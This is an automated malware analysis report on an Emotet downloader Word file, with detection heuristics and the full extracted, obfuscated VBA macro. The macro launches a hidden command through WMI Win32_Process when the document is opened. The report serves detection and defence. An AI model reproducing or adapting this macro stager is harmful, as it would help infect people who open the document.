Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d8f3b27336f71c5b…

MALICIOUS

Office (OLE)

Size: 196.9 KB
Created: 2019-12-18 08:14:00
Authoring application: Microsoft Office Word
First seen: 2020-05-14
MD5: d3100040583751236509f097698d5ff5
SHA-1: 41e81bffbf172f2d03cbbd7d8a2e70b78a6255f5
SHA-256: d8f3b27336f71c5b16a9573a8f0c950e18293d8f112c4e595a2719b66efb06dd
Risk Score: 232

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-7464351-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7464351-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Sycaagcvag = Join(Split("32ksad_weddvwi32ksad_weddvnm3" + "2ksad_weddvgm32ksad_weddvts32ksad_weddv:32ksad_weddv" + "W32ksad_weddvin32ksad_weddv332ksad_weddv2_32ksad_weddv", MNDUE), "") + Ohzfpovte.Okwrtmcmokcs + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Rhcujivdoau = VBA.CreateObject(JJKBSKJ + Sycaagcvag)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10680 bytes
SHA-256: 735c7348189bec3d0f5209f59be363cada8ae1ff8fd2e6a4a9c83a586a7dd0fa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
343 of 514 identifiers look randomly generated (e.g. 'W32ksad_weddvin32ksad_weddv332ksad_weddv') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ohzfpovte"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Okwrtmcmokcs, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Select Case Vgvlvktybvj
         Case Kyysnhlim
   Rzciwhkfx = Sin(Wtqtbsugkd)
   Zcdfgxdfjspuw = CStr(Cukeicybec)
   Sngcbgacg = 324
   Ehuyceev = Sin(Hslazcwaaycm)
   Rdpoovfeir = CStr(Ndvxagwnkvucc)
   Cguzrrkh = 567
   Qhbodjttcpt = Sin(Yvqdawjm)
   Sdyospfdww = CStr(Zvyglajank)
   Vebnjkqb = 5645
End Select
For Jkfubdwmxitow = Tlidlxifu To Ostlfifdmnb
      While Fdbmokhhgipyh <> Yafkbnpesldk
         Iqsukxiwvrkl = Jemxkmeli * Atn(Kpyiblzyoxr) * (Xalcfozqh + Oyfawpxibfzh)
      Wend
Next
   Select Case Wmrasvwsic
         Case Lvwgaxvcvafmh
   Gfxcdgblx = Sin(Zepcdabr)
   Qfblmjnvh = CStr(Fpqmkaqpkjyp)
   Qmtxfkpnapawq = 324
   Oqqljtpyptalb = Sin(Sqdnvwuycudso)
   Ojzsvshdne = CStr(Deeznxexjsd)
   Usoqgbax = 567
   Qmiudknqi = Sin(Quxvpvkddv)
   Sbasmgda = CStr(Znnfdamw)
   Brdyqvrfquzj = 5645
End Select
For Qtdrbjftsq = Ikrjrhsmbb To Brpxkwbp
      While Pkxuutpi <> Dgmhohcrryh
         Apjuhjwofhevh = Myxtcjzvehjct * Atn(Ewaowelzhzczx) * (Mgwgfsaol + Ufmxgdfg)
      Wend
Next
   Select Case Lwvpsjsqzamt
         Case Igfsjmpam
   Brbnflat = Sin(Zqrjrxuzwqxjq)
   Nvumfkkhl = CStr(Rdtpmzqlipoj)
   Vbqxfsbjfsq = 324
   Rlpjfsagq = Sin(Exsejrzlc)
   Itjfypixaz = CStr(Zatgiqrhewjt)
   Xantedjhcvzzu = 567
   Sehyeteplqulq = Sin(Kqxysikhuc)
   Xygjwgjmrbvd = CStr(Kbcjrtbqlicv)
   Iwnwvcgqfhy = 5645
End Select
For Tvivtszxi = Kqpgnygaot To Ozhdmuwvlmmi
      While Nidtsarc <> Mzdgaxqnq
         Wlpmdlkzxdhl = Yxuacdlncr * Atn(Punvyruiqwn) * (Pgdobfoswca + Nxijjxzmvp)
      Wend
Next
Hlapdnjk
End Sub

Attribute VB_Name = "Svwebryswbx"
Attribute VB_Base = "0{E63A8E29-ECBB-4891-834E-6C8A7EB38957}{AC36B4C4-DB8F-4E14-AAD0-E9DD8E767F8E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Syiycnhxkbedn"
Function Pvpmmwkzwdlme()
   Select Case Wsmdwaydefns
         Case Keeepqlxzrhu
   Epaikfajghwan = Sin(Dvbmvbzswra)
   Tuwbqazpefint = CStr(Xiocaivvgiove)
   Rjybplku = 324
   Mzyqsybzbvn = Sin(Grxzqtbfusaoy)
   Mmmoepoixenj = CStr(Ccqokrjsltaii)
   Yctjinpiz = 567
   Siaudjojrq = Sin(Oxjubsnvhwbyc)
   Eintrrbz = CStr(Qqqtyarocfmz)
   Plbbwhbskjj = 5645
End Select
For Wsimyick = Ciwjkznnfozdf To Ctqyggky
      While Wutnqqdnoztz <> Swweldtmtmvp
         Wqskapofua = Wqrphcvyfjkgm * Atn(Jbhsberr) * (Izidncvpn + Udesungm)
      Wend
Next
Dwyjwtrbgp = Ohzfpovte.Okwrtmcmokcs
   Select Case Apeitobvjaxx
         Case Akvcidef
   Ikyjtfnwfmq = Sin(Nxbeozgfwtbl)
   Rnenvunaips = CStr(Mbrnlvpi)
   Zpgollqxy = 324
   Wiayukhmoml = Sin(Teefpqnglhey)
   Cprsulnqt = CStr(Qkhvqundlvh)
   Hidjkavafe = 567
   Wtrahclnqzffl = Sin(Rudkvjglli)
   Svpkfcytb = CStr(Esvsuhcx)
   Nefcuknqhfs = 5645
End Select
For Ssapzdmblusys = Lejkfreqkhl To Dtqkbwdzus
      While Mmcjmdckxedw <> Eocphnlbyseix
         Qrlfqsecgxdjg = Ptcdroxekpilo * Atn(Egfogmrqr) * (Mwsdeenz + Ftehtnbqhh)
      Wend
Next
Jltfxipurrvv = Dwyjwtrbgp + Svwebryswbx.Artcdlagwia + Svwebryswbx.Ojskbjakj + Svwebryswbx.Gpihqmcxuyw
   Select Case Aldrmcty
         Case Hmjgoeuxblzy
   Siuonsultylu = Sin(Phaokhspwdpi)
   Pfccgjzeif = CStr(Avtkutob)
   Kloxbclryemh = 324
   Wjohtkzvcgh = Sin(Miwueevuqoihw)
   Ghrszfolfhi = CStr(Pihqefyicjid)
   Fugzxriovooy = 567
   Xqnwhafigrcqu = Sin(Xjpxmiqyh)
   Mamtcgoal = CStr(Lvanxopxgwaky)
   Afpgsflbofvno = 5645
End Select
For Twtbxuxz = Jkejlqon To Jketqaumh
      While Aaederxi <> Geeivhsd
         Ajqsirzkw = Rjbjjzghzr * Atn(Cdgalusc) * (Uaqjmumrmles + Czmimwqqvjoo)
      Wend
Next
Rplojgrhtxtd = Jltfxipurrvv + Svwebryswbx.Pmtmthhw + Svwebryswbx.Tzhtsotph.Factoid
   Select Case Ctqxabzopzct
         Case Vifgbdesy
   Lyymcscd = Sin(Rostyfsvppfl)
   Nkjjqojue = CStr(Cacmgaqcmeu)
   Dxlwjwwzjp = 324
   Jsmejxjwewfp = Sin(Ppjcetxwgs)
   Lhapskduwid = CStr(Hkqihsvm)
   Gqglfumlt = 567
   Lcvodumpmglka = Sin(Gnzagalaty)
   Xzkwjwgviuudy = CStr(Navfgownyltuv)
   Cpruopck = 5645
End Select
For Ubaltwcxdyz = Fkbmlkqbkvgs To Duhkpsrmmv
      While Pqxrabewl <> Drzmmjfutoj
         Vojfbtxf = Uzetuenib * Atn(Etqgedhbi) * (Ruvmryurm + Lfmhqkqfgifu)
      Wend
Next
Pvpmmwkzwdlme = Drpemnasjwfa + Rplojgrhtxtd + Drpemnasjwfa
   Select Case Uhlsynexfptw
         Case Kpqzinam
   Zrmzlaor = Sin(Zlpnsjfvlz)
   Kklevugltisj = CStr(Bfleabvoc)
   Dgyiebqf = 324
   Bogetkppr = Sin(Ulhzjgyuz)
   Lesohdpgc = CStr(Azrezhqgykf)
   Vriuurkgk = 567
   Cmfdmakr = Sin(Kiifhqesx)
   Jksquumku = CStr(Fpbncnuyzot)
   Iapmbfnmwv = 5645
End Select
For Mmrfygha = Tduoqyzx To Jhhufziotej
      While Lpbcsbhma <> Hmsmpomye
         Fewzyxsgptzu = Pvgvkdiqbnthw * Atn(Rkpftjwgt) * (Tublhrjnat + Tzjpdjgr)
      Wend
Next
End Function
Function Hlapdnjk()
   Select Case Ptfshsnddsa
         Case Pcglqcadapzv
   Jdhqentpbua = Sin(Ehqsnainhlw)
   Bnoegxdbeawb = CStr(Yzbmkxnvvjxm)
   Ccrknjlfaxoc = 324
   Ahuqrfkngzm = Sin(Fsfgtcizc)
   Oljsydyhha = CStr(Pgupkowsygc)
   Vquahoyyicf = 567
   Pcaezgkepayn = Sin(Gpmijdfcmd)
   Mxogdpts = CStr(Sugwuigqvmjd)
   Wuwsnmpxwz = 5645
End Select
For Pjwjufkmxsb = Wwwiuqiffk To Afnevxhdgtxu
      While Etfldskiqpto <> Kijymqtawi
         Ticdzbwbmpzu = Iroxkgvysyj * Atn(Vzewwjjzb) * (Qrsawviprvi + Zxwyvqeubu)
      Wend
Next
MNDUE = "32ksad_weddv"
Sycaagcvag = Join(Split("32ksad_weddvwi32ksad_weddvnm3" + "2ksad_weddvgm32ksad_weddvts32ksad_weddv:32ksad_weddv" + "W32ksad_weddvin32ksad_weddv332ksad_weddv2_32ksad_weddv", MNDUE), "") + Ohzfpovte.Okwrtmcmokcs + "rocess"
   Select Case Hggvegjsms
         Case Dsyhchhqggd
   Lfhyfmiac = Sin(Oisgecwozg)
   Nmhgerfbd = CStr(Tactgglpbv)
   Toaldjpybsat = 324
   Feiwwfgvzfbiq = Sin(Rsjysnsdgbr)
   Lbzjhiagge = CStr(Nxpvjvtgkk)
   Utknacufrwk = 567
   Sbhhhknlo = Sin(Ciwgxhyabjo)
   Mgejtrqnrprtl = CStr(Zlfgnuls)
   Hkyjwwdnkub = 5645
End Select
For Rwpckseml = Bpdhzcbnxumh To Vtngbdcs
      While Jysazcbvcci <> Voitnijfpxyp
         Gketiipxbjb = Sqepvoasstko * Atn(Iuatkalvkxjzy) * (Myrznqpkicazy + Teykhdaqqnjx)
      Wend
Next
Set Rhcujivdoau = VBA.CreateObject(JJKBSKJ + Sycaagcvag)
   Select Case Ibeityhdxz
         Case Hcdqjiljqe
   Phomrpalxtsy = Sin(Yfljmhozr)
   Imueoseol = CStr(Kumhzpnokf)
   Kfxhrfdqq = 324
   Icfhiankd = Sin(Vqwehzldla)
   Kyqlmjicw = CStr(Efthenwvysy)
   Lmxdemgfb = 567
   Irpbaujpdcsz = Sin(Hppfjompjzzl)
   Jlidkyymxuudi = CStr(Ftnjlxxqa)
   Jtipbppmf = 5645
End Select
For Oppturulgfdj = Mbtamuhle To Eitfnwcnl
      While Urcfwplafkdjo <> Ltyldlzopjbfs
         Wtcpgbxh = Zejubyerqljo * Atn(Mvdmvujt) * (Okhzgunma + Gptokwobx)
      Wend
Next
Ghvtrxurmjii = Sycaagcvag + Svwebryswbx.Tscectrcdsvyy.ControlTipText + Svwebryswbx.Hidrkcwoctp.ControlTipText
   Select Case Lvxashrlsvmda
         Case Jpbswjzvmyg
   Gfxerhljqmh = Sin(Caunwmjzqfuxy)
   Akbmzefnyi = CStr(Ogscuvbgybyc)
   Nqzcgtszjfkvx = 324
   Nvfktvtxcabxh = Sin(Mzsaronvbsaow)
   Zxkilftsadtt = CStr(Fvkmktld)
   Izaertgx = 567
   Bdnzbtshrx = Sin(Qswxpclugvbk)
   Epbhwwjmbb = CStr(Kqadlzcnii)
   Delodfcdyppd = 5645
End Select
For Bbldqupdru = Kchmdwgh To Kujwzfmvbwxb
      While Bernezmr <> Uavmlsxy
         Rquuukqvty = Egkzfsddf * Atn(Ibyjakiz) * (Okljwtuirywv + Pblnevceyqmsv)
      Wend
Next
Kgbephgsxo = Ghvtrxurmjii + Ohzfpovte.Okwrtmcmokcs
   Select Case Qqluhhyaemb
         Case Uleajwdabyfix
   Nwitjzmmilcxt = Sin(Canilnlwpbzpp)
   Lkaynieik = CStr(Yvohyjvdv)
   Pvmbzsrjjxuc = 324
   Wvrqysdidopi = Sin(Qumvcrve)
   Imrbpketop = CStr(Emxlrgrylrj)
   Plyaiwsjfhma = 567
   Tkwttbcpzyqa = Sin(Ozrcdhayftg)
   Eyelkpnxnp = CStr(Mrzlakhievg)
   Xtsuednarx = 5645
End Select
For Mfkbpaktlqqa = Iykejsobn To Dimkpvuiroex
      While Uvwyhdrhauo <> Nyfkspflrx
         Uwsvqebdoowr = Sdvisvzjg * Atn(Dmibddxncm) * (Mjqnmxycohmwc + Fovlpjjnrt)
      Wend
Next
Set Hlapdnjk = CreateObject(Kgbephgsxo)
   Select Case Udnqgzbfknryb
         Case Pfimgowwdmc
   Bgbufamyy = Sin(Icsgsovpib)
   Uzwkyhkeegsed = CStr(Saypqfyeewpdo)
   Khkkguipnr = 324
   Fbjncgrcokmar = Sin(Sojdwnrvlutf)
   Kkxdjtduim = CStr(Nxavjslzqbenr)
   Fxtjaosdaox = 567
   Rxfwgzzu = Sin(Kbudtjfklaf)
   Pdwivtagmjjht = CStr(Hsitkhihg)
   Uueliwuaqsjqe = 5645
End Select
For Jxrlwanwcsrm = Gvqyvzfcbbm To Epxbdspylquo
      While Ybsqjhkkw <> Ibpgwpyjgigf
         Uxrvevjwshb = Cfiutejvrz * Atn(Bwfsxrvbdpj) * (Rxiljienewd + Nahsdyzgdze)
      Wend
Next
Hlapdnjk.XSize = False
   Select Case Rbobrehd
         Case Cxdhovzjwomzl
   Bjymgjhzk = Sin(Xwhgntfjue)
   Zxbgywosqet = CStr(Jqapuysnfydb)
   Stbpdlty = 324
   Dicwbsscr = Sin(Cfuzgxcu)
   Ejvwypppeckcu = CStr(Vwmnfakdxp)
   Pxnqeqhyy = 567
   Dddnmjta = Sin(Nkaqhsxuf)
   Jizsrlflm = CStr(Owijcnxudpe)
   Mmaxxket = 5645
End Select
For Tveuvynoxuaw = Xqkwlurfi To Ekiocjtfc
      While Xsbvqagfbqi <> Gziiocnm
         Rnfaukgqbri = Upeqzdvqvqhi * Atn(Lqabcrek) * (Aluvzhbsni + Kloilxvxxrrj)
      Wend
Next
Hlapdnjk.YSize = False
   Select Case Tmuuzgcdlwo
         Case Tiapqhpjm
   Nrzefnyl = Sin(Srrcfptdw)
   Ykovcuidrf = CStr(Tgihyyyxc)
   Brjnkrwf = 324
   Ppglicsqhc = Sin(Lyvxhueyzi)
   Nethylvzrv = CStr(Bwqvfhucbpf)
   Nkbarjhwyydj = 567
   Vhztquevlejs = Sin(Qgxzipkbtya)
   Udxmmupzubwoq = CStr(Yxryrugraebv)
   Obteyjrnrwyc = 5645
End Select
For Ebkrcsdvgbvb = Wikyiegack To Akguzofk
      While Tktorsuriwvfr <> Aujpeyzyzs
         Lchveawoaeu = Flcviutwizt * Atn(Hbtltvydipba) * (Uulvzwbym + Rxzsdcnz)
      Wend
Next
Do While Rhcujivdoau.Create(UJNDB & Pvpmmwkzwdlme, Blvlmzkw, Hlapdnjk, Xkkccbkwm)
Loop
   Select Case Pztynubt
         Case Aobyrqjhloqf
   Gfaglbhahfm = Sin(Tvrspygcl)
   Bmxrnlljzgsh = CStr(Hcmzhvmbjqlu)
   Htkuofey = 324
   Nvucqzaowxi = Sin(Devhadhgtqkc)
   Ytoqizwmlbjlj = CStr(Xysmyhqtxevwj)
   Jajdcuigz = 567
   Qstxotriwssqh = Sin(Zqmncntgs)
   Fncprspa = CStr(Azpbfaxmqjbou)
   Tmtlwlaomnd = 5645
End Select
For Azahxkzrx = Mvtbzartgxygw To Mzlcnbtqmrju
      While Vawavybryo <> Kzictdrdxafux
         Ehkqgaikxbfa = Vaxqrqtikyfc * Atn(Vubdzfxkox) * (Bokancalczie + Zwwmkdovp)
      Wend
Next
End Function